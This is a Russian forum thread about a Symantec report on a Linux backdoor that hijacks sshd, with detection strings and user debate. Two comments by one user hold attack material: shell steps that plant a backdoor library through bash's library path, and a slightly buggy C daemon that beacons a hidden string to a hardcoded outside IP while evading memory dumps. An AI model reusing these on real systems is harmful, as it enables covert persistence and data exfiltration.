URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 92667
[ Назад ]

Исходное сообщение
"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."

Отправлено opennews , 16-Ноя-13 00:13 
Компания Symantec в результате разбора  атаки на одного из  крупных хостинг-провайдеров  выявила (http://www.symantec.com/connect/blogs/linux-back-door-uses-c...) новый вид бэкдора для Linux. Бэкдор выполнен в форме разделяемой библиотеки, перехватывающей ряд стандартных вызовов, таких как read, EVP_CipherInit, fork и ioctl. Библиотека связывается с работающими на системе сетевыми процессами, такими как sshd, берёт на себя обработку указанных вызовов и получает контроль над трафиком поражённых серверных приложений.


При работе бэкдор не сохраняет файлов, не создаёт сокетов и не инициирует сетевые соединения, прикрываясь в своей активности поражённым серверным процессом, что затрудняет его обнаружение. Управляющие команды передаются в составе штатного сетевого трафика, через интеграцию подставных блоков. Бэкдор отслеживает появление в нормальном, не вызывающем подозрение, трафике маску ":!;.", при обнаружении которой декодирует следующий за ней блок данных. Данные закодированы с использованием шифра Blowfish и следуют в формате Base64.


Через закодированные блоки, примешанные в обычный трафик, могут передаваться управляющие команды для выполнения произвольной shell-команды или отправки в ответ накопленных бэкдором данных. Основное функцией бэкдора является перехват и накопление конфиденциальных данных, таких как пароли, ключи шифрования и email-адреса. В частности, поддерживается перехват паролей и SSH-ключей пользователей, подсоединяющихся к поражённой системе.


В качестве методов выявления бэкдора может использоваться анализ наличия маски ":!;." в трафике. Но этот метод не эффективен, так как бэкдор может длительное время не проявлять себя. Более надёжным вариантом является сохранение дампа памяти работающего процесса sshd и поиск в нём специфичных для бэкдора строковых данных, таких как "key=", "dhost=", "hbt=3600", "sp=", "sk=" и "dip=".

URL: http://www.symantec.com/connect/blogs/linux-back-door-uses-c...
Новость: http://www.opennet.me/opennews/art.shtml?num=38441


Содержание

Сообщения в этом обсуждении
"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Dcow , 16-Ноя-13 00:13 
Вау LD_PRELOAD.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 16-Ноя-13 02:06 
# cp /bin/bash /tmp/
# cd /tmp
# readelf -a  ./bash  | grep PATH
0x000000000000000f (RPATH)              Library rpath: [/lib64/bash/4.2]
0x000000000000001d (RUNPATH)            Library runpath: [/lib64/bash/4.2]

# cp /tmp/libbackdoor.so /lib64/bash/4.2/
# ln -s /lib64/bash/4.2/libbackdoor.so /lib64/bash/4.2/libreadline.so.6
# ldd ./bash
/bin/bash: symbol lookup error: /bin/bash: undefined symbol: emacs_meta_keymap

Ну сами понимаете, надо сделать копию libreadline.so.6 со своими плюшками.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено fi , 16-Ноя-13 14:21 
> /bin/bash: symbol lookup error: /bin/bash: undefined symbol: emacs_meta_keymap
> Ну сами понимаете, надо сделать копию libreadline.so.6 со своими плюшками.

Идея интересная, но там нет вызовов  read, EVP_CipherInit, fork и ioctl, нужен механизм preload.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 19:47 
>libreadline
>нет вызовов read

Что еще расскажешь?


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено burjui , 16-Ноя-13 16:02 
При чём тут бухта?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено A.Stahl , 16-Ноя-13 00:13 
Т.е. чтобы эта штука заработала, мне надо скачать что-то неведомое, а потом ещё и запустить это из-под рута? Да ещё и не выгружать эту дрянь из памяти?
Думаю, я в безопасности.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 00:24 
Чем докажешь, что у тебя не Убунта на сервере да еще с иксами и софтом из ppa? :)

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 00:38 
Чем Убунта не угодила? У Гугл и Википедии проблем с ней нет.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 01:35 
Откуда инфа, что проблем нет?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 06:38 
libastral подсказывает

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено рыапыапр , 16-Ноя-13 11:47 
Для пользователей по крайней мере не заметно

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 17:54 
> Для пользователей по крайней мере не заметно

(ехдно) Успешный взлом и должен годами оставаться незаметным. Не только пользователям, но даже сисЯдмину. :)


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 17-Ноя-13 14:56 
> (ехдно) Успешный взлом и должен годами оставаться незаметным. Не только пользователям,
> но даже сисЯдмину. :)

При том обычно кульсисопов ломают чаще чем википедии и гугли. Потому что у тех есть персонал который может за машинами нормально следить, в отличие от.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Antonim , 16-Ноя-13 01:38 
Софт из ppa, лично мне, даже на домашней машине в голову не прийдет под рутом запускать. А на рабочих либо основные сервера, либо самому пакеты собирать, ну или у меня кое где лицензионные PPA стояли.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено lucentcode , 16-Ноя-13 01:56 
Лицензионных PPA не бывает. Сама абревиатура как бы намекает, что это персональные архивы пакетов, то есть за их содержимое отвечает какой-то Вася Пупкин, а не Canonical или сообщество. Если на сайте разработчика того, или иного ПО прямо не указан адрес PPA-репозитория, вполне возможно, что автор приложения, и владелец PPA, который выдаёт себя за автора - абсолютно разные люди. Где гарантия, что Вася - это Вася? И что он не подмешал какую-то дрянь к сорцам собранного им приложения? Вы пишете, что не запускаете под рутом софт из PPA. Похвально. Но знаете ли вы, что во время установки любого пакета, пакетный менеджер(работающий с привилегиями суперпользователя) может выполнить скрипт произвольного содержания? Вот материал(http://www.debian.org/doc/debian-policy/ch-maintainerscripts...), который стоит прочесть, перед тем, как вы надумаете в следующий раз устанавливать какую-то гадость из PPA.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pocqnchik , 16-Ноя-13 08:31 
а как без рута?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено lucentcode , 16-Ноя-13 19:54 
> а как без рута?

Никак. При установке пакета производятся действия, для которых необходимы повышенные привилегии. Вот поэтому ни в коем случае не стоит запускать пакет из неизвестного источника на установку. Я когда сомневаюсь - собираю пакетик ручками, и не имею потом проблем. Заодно можно собрать программу с нужными флагами сборки.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 17-Ноя-13 14:57 
> неизвестного источника на установку. Я когда сомневаюсь - собираю пакетик ручками,
> и не имею потом проблем. Заодно можно собрать программу с нужными
> флагами сборки.

Вопрос на засыпку: что помешает при этом подпихнуть в скрипты сборки/установки или просто сорец программы что-нибудь бонусное? Врядли ты вычитываешь все это от и до...


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено lucentcode , 17-Ноя-13 18:03 
А тут уже всё держится на доверии к разработчикам программы, и на их репутации. Проверять исходный код - дело трудоёмкое... Просто я больше склонен доверять разработчикам ПО, чем сомнительным личностям, собравшим пакетик не понятно из чего, и с какими намерениями. Была бы возможность автоматической проверки исходных кодов на не скрытый функционал - я бы с удовольствием сканировал сорцы, что-бы быть уверенным, что автор программы не оставил в ней бэкдора. А самому ковырять исходники как-то лениво... Да и бэкдор может быть не очевидным для не специалиста в нужной предметной области...

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 17-Ноя-13 14:26 
wheel

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 14:48 
Не совсем так. Часть ППА ведется как раз таки разработчиками, в том числе и из Каноникл. А вот левые ставить это да - бред, лучше самому скомпилять.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено lucentcode , 16-Ноя-13 19:51 
> Не совсем так. Часть ППА ведется как раз таки разработчиками, в том
> числе и из Каноникл. А вот левые ставить это да -
> бред, лучше самому скомпилять.

Верно. Но если об этом написано только на странице PPA, но об этом нет ни слова на сайте проекта, я бы усомнился, а точно ли разработчик создал ту, или иную PPA. Написать на страничке  PPA можно что угодно. Не нужно слепо этому верить. Доверяй, но проверяй:)



"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 21:41 
> Где гарантия, что Вася - это Вася?

В его ключах которыми подписываются пакеты, как и обычно. А вот доверять ли Васе или нет - это уже на вашей совести. Если в большом сообществе Васи более-менее прошли проверку временем и сотнями глаз, то с PPA уровень доверия Васям разумеется ниже. Тем не менее, у ряда Вась вполне нормальная репутация а подписи гарантируют что это именно тот Вася, а не какой-то самозванец.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено lucentcode , 17-Ноя-13 02:22 
Вот именно, что всё строится на доверии к тому, или иному персонажу... Проверил подпись, решил что доверяешь хозяину PPA - и понеслась установка пакетов. Но ведь не мало людей просто в бложике каком-то прочитали, что для установки пакета нужно добавить PPA и установить пакет, и больше их ничего не интересует...



"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 17-Ноя-13 23:26 
> больше их ничего не интересует...

А уж сколько людей купилось на увещевания наперсточников на улице...


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Mr. Cake , 16-Ноя-13 15:00 
А ничего что при установке любого deb-пакета (в т. ч. из PPA) postinstall скрипт выполняется от рута? А ничего что пакет может содержать бинарник с флагом setuid?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено vitalif , 16-Ноя-13 00:52 
Ну с задачей "не выгружать это из памяти", видимо, отлично справится LD_PRELOAD )

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Пиу , 16-Ноя-13 01:50 
не совсем
что это заработало, нужно найти дырку в похапе, потом из-за кривых настроек поднять себе привилегии до рутовых, а потом спрятаться в процессе sshd
вот это называется бэкдор. а то с чем вы спутали называется троян и к новости не относится

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Ordu , 16-Ноя-13 02:56 
Не, это называется проникновение в систему. А бекдор -- это то, что проникнувшие оставляют на память о своём проникновении.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено XoRe , 16-Ноя-13 02:56 
> Думаю, я в безопасности.

Ога.
http://www.opennet.me/opennews/art.shtml?num=36933


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено arisu , 16-Ноя-13 04:05 
> Ога.

ога. не надо запускать всякое непонятное говно, найденое на помойке.


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено XoRe , 17-Ноя-13 00:18 
>> Ога.
> ога. не надо запускать всякое непонятное говно, найденое на помойке.

По ссылке эксплоит, который может запустить простой юзер.
А у хостера таких простых юзеров с шеллами - тысячи.


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено arisu , 17-Ноя-13 00:21 
для особо тупых повторяю ещё раз: «не надо запускать всякое непонятное говно, найденое на помойке».

"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено linux must __RIP__ , 17-Ноя-13 12:05 
для arisu повторяем - ты в своей песочнице на n900 можешь запускать что хочешь, а вот когда дело дойдет до хотера - они гады предоставляют шеловый доступ.. и далеко не каждый запускает юзера в отдельном контейнере. Вот же гады.. а выполнив код в ядре можно и selinux обойти..

"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено Crazy Alex , 17-Ноя-13 21:31 
ну туда им и дорога. Когда уже эти тупые шареды передохнут...

"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено Аноним , 17-Ноя-13 23:28 
> что хочешь, а вот когда дело дойдет до хотера - они
> гады предоставляют шеловый доступ.. и далеко не каждый запускает юзера в
> отдельном контейнере.

Отлично, накоенец то поголовье извращенцев-пи...сов поубавится. Хотя-бы и при помощи невкусных пинков.


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено XoRe , 20-Ноя-13 21:18 
> для особо тупых повторяю ещё раз: «не надо запускать всякое непонятное говно,
> найденое на помойке».

Легко называть всех тупыми, когда админишь только localhost :)
Когда начнете админить что-то публичное, поймете, о чем я.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 05:46 
>  Стандартные вопросы: как давно это существует, и как много кто этим
> смог воспользоваться? (А кто?) И зависит ли наличие уязвимости сей от
> того, какая это версия ядра, дистрибутива, или ПО в нем? (а
> если не на серверах, а в каком другом сетевом оборудовании, то
> там это все может ли быть?)
>  Может ли что подобное не выявленное где существовать еще?
>  (а Сноуден ничего там случайно об этом не знает? А то,-
> он же аж десятки тысяч црушных секретных документов тех тогда там
> раздобыл).

Это руткит, а не эксплоит. Он не эксплуатирует уязвимости, а позволяет атакующему закрпеться в успешно атакованной ранее системе.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Пиу , 16-Ноя-13 18:33 
но его наличие (и то что его нашли в дикой природе) указывает (как лакмусовая бумажка) на наличие дыры где-то. вопрос откуда он взялся - вот вопрос

"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено arisu , 16-Ноя-13 18:41 
в большинстве случаев это дыра в голове wannabe-админа.

"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено Пиу , 16-Ноя-13 19:19 
> в большинстве случаев это дыра в голове wannabe-админа.

а в данном случае?


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено arisu , 16-Ноя-13 19:24 
>> в большинстве случаев это дыра в голове wannabe-админа.
> а в данном случае?

а вданном случае вообще бла-бла-бла. ни сэмпла, ни информации про пути распространения.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 18-Ноя-13 11:11 
Используется одна из туч уязвимостей, за тебя все успешно устанавливает злоумышленник, а потом ты ничего никогда не заметишь, т к уверен в собственной безопасности.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено fi , 16-Ноя-13 01:15 
Круто! хорошо задумали, все думал когда будут такое использовать.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 19:49 
> Круто! хорошо задумали, все думал когда будут такое использовать.

Руткиты появились в незапамятные времена. И, кстати, изначально под юникс-системы. И техника перехвата функций до сокрытия своей деятельности и передачи данных атакующему тоже с длинной бородой.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено ананим , 16-Ноя-13 01:31 
Самого главного нет — как распространяерся?
Если "вручную", то не место сабжу в лучшем случае в мини-новостях.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 02:06 
Распространяться оно может как угодно. Например, каким-нибудь пакетом автоматического поиска популярных дыр на серверах. Нашёл подходящие дыры — вкатил эту дрянь.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Нанобот , 16-Ноя-13 02:27 
вопрос был "как распространяется", а не "как может распространяться"

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 18-Ноя-13 11:13 
> вопрос был "как распространяется", а не "как может распространяться"

Как может так и будет, при необходимости.
Бэкдор найден в дикой природе, а не сделан в лаборатории. Пострадал лион клиентов и крупный хостинг. Щас вам все напишут после расследования.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено ананим , 16-Ноя-13 07:30 
Как угодно — это бред, а не ответ.
Вот я придумал супер вредоносное ПО (rm -rf /). Распространите его плс.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 12:05 
> Как угодно — это бред, а не ответ.
> Вот я придумал супер вредоносное ПО (rm -rf /). Распространите его плс.

Вы его как раз сейчас и распространили :)


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Anoybv , 16-Ноя-13 17:00 
"Карачун тебе, Церители"

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами -
наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -
наказываются лишением свободы на срок до семи лет.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Evtomax , 16-Ноя-13 14:38 
Не работает :(

evtomax@debian ~> rm -rf /
rm: опасно рекурсивно обрабатывать «/»
rm: используйте --no-preserve-root, чтобы отменить предупреждение об опасности


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено ананим , 17-Ноя-13 18:10 
Вот именно.
Вначале нужно как минимум стать рутом.

Так что сабж — это не бэкдор в линухе, а шибко умный (возможно бывший), но не чистый на руку админ из одной (только лишь) конторы.

В общем и не выиграл, и не в шахматы,... желтизна.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено tessel , 16-Ноя-13 01:35 
Not bad. Отличная новость и очень здорово, что приведен быстровалидатор для проверки своих систем.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 16-Ноя-13 03:15 
Нукась, покажьте как вы просканили память ssh процесса?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 03:33 
Например, gcore pid, а потом грепать получившийся дамп.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 16-Ноя-13 06:11 
грепай

Посигналу SIGUSR1 шлёт на сайт маздайя волшебную строку.

$ kill -USR1 `pidof a.out`


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

int a[15] = { 53, 55, 50, 39, 52, 15, 50, 35, 53, 53, 57, 49, 52, 38 };

int main(void)
{
        char *arr;
        sigset_t *set;
        struct rlimit limit;
        int sig, i, len, y = 1;
        limit.rlim_cur = 0;
        limit.rlim_max = 0;
        sigemptyset(set);
        sigaddset(set, SIGUSR1);
        sigprocmask(SIG_BLOCK, set, NULL);
        setrlimit(RLIMIT_CORE, &limit);
        daemon(0, 0);
        for (sig = 0;;) {
                sigwait(set, &sig);
                switch (sig) {
                case (SIGUSR1):
                        mlockall(MCL_CURRENT | MCL_FUTURE);
                        arr = malloc(15);
                        for (i = 0; i < 14; i++) {
                                a[i] += 30;
                                memmove((void *)&arr[i], &a[i], 1);
                        }
                        struct sockaddr_in inaddr;
                        int fd = socket(PF_INET, SOCK_STREAM, 0);
                        memset((void *)&inaddr, 0, sizeof(inaddr));
                        inaddr.sin_family = PF_INET;
                        inaddr.sin_port = htons(80);
                        inaddr.sin_addr.s_addr = inet_addr("199.59.243.105");
                        setsockopt(fd, SOL_SOCKET, SO_OOBINLINE, &y,
                                   sizeof(int));
                        setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, (char *)&y,
                                   sizeof(int));
                        connect(fd, (struct sockaddr *)&inaddr, sizeof(inaddr));

                        send(fd, &arr[0], 14, MSG_DONTWAIT | MSG_EOR);

                        close(fd);
                        memset((void *)&inaddr, 0xff, sizeof(inaddr));
                        memset((void *)&inaddr, 0xaa, sizeof(inaddr));
                        memset((void *)&inaddr, 0, sizeof(inaddr));
                        memset(arr, 0xff, 16);
                        memset(arr, 0xaa, 16);
                        memset(arr, 0x0, 16);
                        free(arr);
                        arr = NULL;
                        munlockall();
                        continue;
                }
        }
        return 0;
}

Там посаны блоуфишем балуются, думашь такие косяки оставят?! :D


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 08:57 
> Там посаны блоуфишем балуются, думашь такие косяки оставят?! :D

Блоуфиш, это когда к каждому символу по единичке прибавляют, чтобы никто такой грозный шифр не догадался прочитать? Да, это крутые робяты.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 17:55 
Сходи почитай и больше так не позорься: http://ru.wikipedia.org/wiki/Blowfish
А то, что ты сказал, называется шифром Цезаря.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 17:59 
>> Там посаны блоуфишем балуются, думашь такие косяки оставят?! :D
> Блоуфиш, это когда к каждому символу по единичке прибавляют, чтобы никто такой
> грозный шифр не догадался прочитать? Да, это крутые робяты.

Который ты путаешь с блоуджобом.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 12:34 
В статье очень даже внятно сказано, что в дампе памяти процесса можно искать указанные строки, а вопрос был как получить дамп. Зашифровали б посоны код в памяти — фиг бы что грепать там было бы можно, а в данном случае значит не зашифровали.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 16-Ноя-13 16:36 
key=, dhost=, hbt=3600, sp=, sk=, dip=,... - это половые фантазии Симантека,
эти токены, можно сказать стандарт для ботнетов. Кто-то давно написал, вот
исходники и кочуют между хак-группами.

А бинарники, в дистрибутивах, проверяют на контрольные суммы:

# rpm -V  openssh
openssh
5S.T.....  c /etc/ssh/sshd_config
missing     /lib/systemd/system/sshd.service

# debsums openssh
...


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 17:34 
Вообще-то «прелесть» данного бэкдора в том, что он цепляется к процессам в памяти и пользуется их соединениями и вклинивается в их трафик. Вставить же его в процесс автозагрузки можно уймой способов и без модификации бинарников. Так что проверка контрольных сумм файлов на винте тебе практически наверняка ничего не даст.

И знаешь, если Симантек написали, что в данном бэкдоре такие строки есть, то твоё мнение о их половых фантазиях мягко говоря неуместно если только ты не докажешь обратное. Доверять им в этом вопросе поводов больше, нежели тебе.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 16-Ноя-13 18:47 
Беги, покупай Symantec! Специально для таких новости создают!  :D

> Вообще-то «прелесть» данного бэкдора в том,

Если рут есть дальше можно не рассуждать. Вариантов - милльярд!


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 19:09 
Почему ты такой толстый?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 16-Ноя-13 19:13 
14



"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 16-Ноя-13 19:23 
А!

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено pavlinux , 17-Ноя-13 02:15 
> А!

Кто-то добрый тебя проминусовал :)
Эт ни я, чессово


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Lain_13 , 17-Ноя-13 06:24 
Мне как-то эти циферки безразличны.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено linux must __RIP__ , 17-Ноя-13 12:08 
> key=, dhost=, hbt=3600, sp=, sk=, dip=,... - это половые фантазии Симантека,
> эти токены, можно сказать стандарт для ботнетов. Кто-то давно написал, вот
> исходники и кочуют между хак-группами.
> А бинарники, в дистрибутивах, проверяют на контрольные суммы:
> # rpm -V  openssh
> openssh
> 5S.T.....  c /etc/ssh/sshd_config
> missing     /lib/systemd/system/sshd.service
> # debsums openssh
> ...

чукча не читатель.. Там же написано что бинарник они не модифицируют.. А вся хрень сидит в памяти..


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 17-Ноя-13 23:31 
> чукча не читатель..

Чукча, это вы с таким дурацким ником сидите? :)


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено arisu , 16-Ноя-13 03:38 
я не понял, где пакет-то установочный скачать?

"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено Andrey Mitrofanov , 16-Ноя-13 11:07 
> я не понял, где пакет-то установочный скачать?

Анафема! Надо было GLPv3+ исходники требовать.


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено Аноним , 16-Ноя-13 18:14 
> я не понял, где пакет-то установочный скачать?

Само приползет.


"Linux-бэкдор, организующий скрытый канал связи в..."
Отправлено arisu , 16-Ноя-13 18:36 
>> я не понял, где пакет-то установочный скачать?
> Само приползет.

все авторы это обещают, а оно всё не ползёт и не ползёт. и куда багрепорты слать — а главное, какие — не ясно.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 04:52 
На системе с SELinux + pax +SSP и pie прокатит?

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 05:44 
Это руткит, а не эксплоит.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 08:37 
да.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 05:13 
не плохо, придумано

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 18:15 
> не плохо, придумано

Два Розенталя этому господину. Неплохо пишется слитно, запятая вообще не нужна. Всосал?


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Crazy Alex , 17-Ноя-13 00:58 
Этому не поможет и три

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Омский линуксоид , 16-Ноя-13 07:26 
где взять PPA с таким "бекдором"? Нужно очень.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 08:55 
> Компания Symantec в результате разбора

Это не та компашка, которая пихает свои поделия на диски с вендовыми драйверами к материнским платам? Домашние типа админы это ставят (по привычке ставить все, за что уплочено), а потом мучительно выпиливают эмэсконфигом, регэдитом и сисиклинером?


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 09:11 
Последняя строка из оригинала новости

Symantec protects customers by detecting this back door as Linux.Fokirtor.

ЧТД


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 21:07 
Symantec detects customers by protecting this backdoor.

"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Куяврик , 16-Ноя-13 14:34 
>  сисиклинером?

какая завидная профессия.

ах, да: софт называется сиклинер.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Аноним , 16-Ноя-13 09:09 
Во всей этой истории есть непонятое место. А именно, что это. На одном отечественном уважаемом вирусоборческом ресурсе оно названо вирусом. думаю, это неверно. Ибо на некоторых не менее уважаемых зарубежных ресурсах оно названо трояном.

Не буду тут пояснять различия. Но главное - троян сам не попадает в систему. Его нужно установить. В случае с Linux - с правами суперпользователя. Неважно, установили вы ppa сами, скачали и прописали его в системе, или это сделал за Вас скрипт. Изначально нужно войти суперпользователем и целенаправленно запустить скрипт.

Так что много шума из ничего.

А выводы - не ставьте нестандартные ppa. Из последнего. В Ubuntu 12.04 GIMPа 2.8 не было в репах. Можно было мучительно собирать из исходников, либо искать вручную кучу модулей. А можно было поставить ppa некоего парнишки по имении ... внимание ... кисельгуляш ... А проблема решалась проще - обновить дистрибутив до 13.04.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено Адекват , 16-Ноя-13 11:18 
[quote]
Библиотека связывается с работающими на системе сетевыми процессами, такими как sshd, берёт на себя обработку указанных вызовов и получает контроль над трафиком поражённых серверных приложений.
[/quote]
Тааак...
для начала смотрим какие библиотеки использует sshd, для примера.
[quote]
[user0@homelinux ~]$ ldd `which sshd`
    linux-gate.so.1 (0xb77c1000)
    libpam.so.0 => /usr/lib/libpam.so.0 (0xb7775000)
    libcrypto.so.1.0.0 => /usr/lib/libcrypto.so.1.0.0 (0xb75ab000)
    libutil.so.1 => /usr/lib/libutil.so.1 (0xb75a7000)
    libz.so.1 => /usr/lib/libz.so.1 (0xb7590000)
    libcrypt.so.1 => /usr/lib/libcrypt.so.1 (0xb755f000)
    libgssapi_krb5.so.2 => /usr/lib/libgssapi_krb5.so.2 (0xb7516000)
    libkrb5.so.3 => /usr/lib/libkrb5.so.3 (0xb744c000)
    libc.so.6 => /usr/lib/libc.so.6 (0xb729c000)
    libdl.so.2 => /usr/lib/libdl.so.2 (0xb7297000)
    libk5crypto.so.3 => /usr/lib/libk5crypto.so.3 (0xb7261000)
    libcom_err.so.2 => /usr/lib/libcom_err.so.2 (0xb725b000)
    libkrb5support.so.0 => /usr/lib/libkrb5support.so.0 (0xb724e000)
    libkeyutils.so.1 => /usr/lib/libkeyutils.so.1 (0xb7249000)
    libresolv.so.2 => /usr/lib/libresolv.so.2 (0xb7231000)
    /lib/ld-linux.so.2 (0xb77c2000)
    libpthread.so.0 => /usr/lib/libpthread.so.0 (0xb7215000)
[user0@homelinux ~]$
[/quote]

потом смотрим каким пакетам принадлежат эти библиотеки:
[quote]
[user0@homelinux ~]$ pacman -Qo /usr/lib/libpthread.so.0
/usr/lib/libpthread.so.0 принадлежит glibc 2.18-9
[user0@homelinux ~]$
[/quote]
пакет glibc ставится из офф репа, и имеет цифровую подпись.
Я думаю это поможет выявить злодея.
На крайний случай, можно просто переустановить sshd, и все приложения, который предаставляют разделяемые библиотеки sshd'у, переустановить из офф репов.


"Linux-бэкдор, организующий скрытый канал связи в легитимном ..."
Отправлено cmp , 17-Ноя-13 18:04 
